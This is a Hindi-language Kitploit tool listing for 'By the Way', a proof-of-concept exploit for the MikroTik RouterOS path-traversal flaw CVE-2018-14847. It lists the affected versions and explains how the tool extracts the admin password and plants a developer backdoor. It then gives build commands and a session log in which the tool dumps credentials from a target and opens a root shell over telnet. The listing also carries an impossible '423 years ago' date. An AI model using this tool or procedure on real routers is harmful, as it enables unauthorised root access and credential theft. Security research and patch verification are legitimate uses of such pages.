Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
routeros-CVE-2018-14847-bytheway — By the Way एक एक्सप्लॉइट है जो RouterOS संस्करण चलाने वाले Mikrotik डिवाइसों पर रूट शेल सक्षम करता है: | Kitploit
उपकरण/GitHubGitHub/babyshen/routeros-cve-2018-14847-bytheway
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षापासवर्ड हमलेभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंग
GitHubbabyshen/routeros-cve-2018-14847-bytheway

routeros-CVE-2018-14847-bytheway

By the Way एक एक्सप्लॉइट है जो RouterOS संस्करण चलाने वाले Mikrotik डिवाइसों पर रूट शेल सक्षम करता है:

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
423 साल पहलेअभी तक समीक्षित नहीं

By the Way

By the Way एक एक्सप्लॉइट है जो निम्नलिखित RouterOS संस्करण चलाने वाले Mikrotik डिवाइसों पर रूट शेल सक्षम करता है:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42.0
  • Beta: 6.29rc1 - 6.43rc3

यह एक्सप्लॉइट पाथ ट्रावर्सल भेद्यता CVE-2018-14847 का लाभ उठाकर एडमिन पासवर्ड निकालता है और डेवलपर बैकडोर को सक्षम करने के लिए एक "option" पैकेज बनाता है। एक्सप्लॉइटेशन के बाद हमलावर एडमिन के पासवर्ड के साथ रूट उपयोगकर्ता "devel" का उपयोग करके Telnet या SSH से कनेक्ट कर सकता है।

Mikrotik ने CVE-2018-14847 को अप्रैल में ही पैच कर दिया था। हालाँकि, जब तक यह PoC नहीं लिखा गया था, मुझे नहीं लगता कि यह सार्वजनिक रूप से खुलासा किया गया था कि इस हमले का उपयोग फ़ाइलें लिखने के लिए किया जा सकता है। Mikrotik की एडवाइज़री आप यहाँ पा सकते हैं:

  • https://blog.mikrotik.com/security/winbox-vulnerability.html

ध्यान दें कि, हालाँकि यह एक्सप्लॉइट Winbox के लिए लिखा गया है, इसे HTTP पर पोर्ट किया जा सकता है, बशर्ते आपको एडमिन क्रेडेंशियल्स की पूर्व जानकारी हो।

निर्भरताएँ

यह PoC निम्न पर निर्भर करता है:

  • Boost 1.66
  • pthread
  • cmake

बिल्ड निर्देश

root@kitploit:~
mkdir build
cd build
cmake ..
make

उपयोग उदाहरण

root@kitploit:~
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 
Login failed, incorrect username or password

Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251

   ╔╗ ┬ ┬  ┌┬┐┬ ┬┌─┐  ╦ ╦┌─┐┬ ┬
   ╠╩╗└┬┘   │ ├─┤├┤   ║║║├─┤└┬┘
   ╚═╝ ┴    ┴ ┴ ┴└─┘  ╚╩╝┴ ┴ ┴ 

[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials 
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 


BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
टूल डाउनलोड करें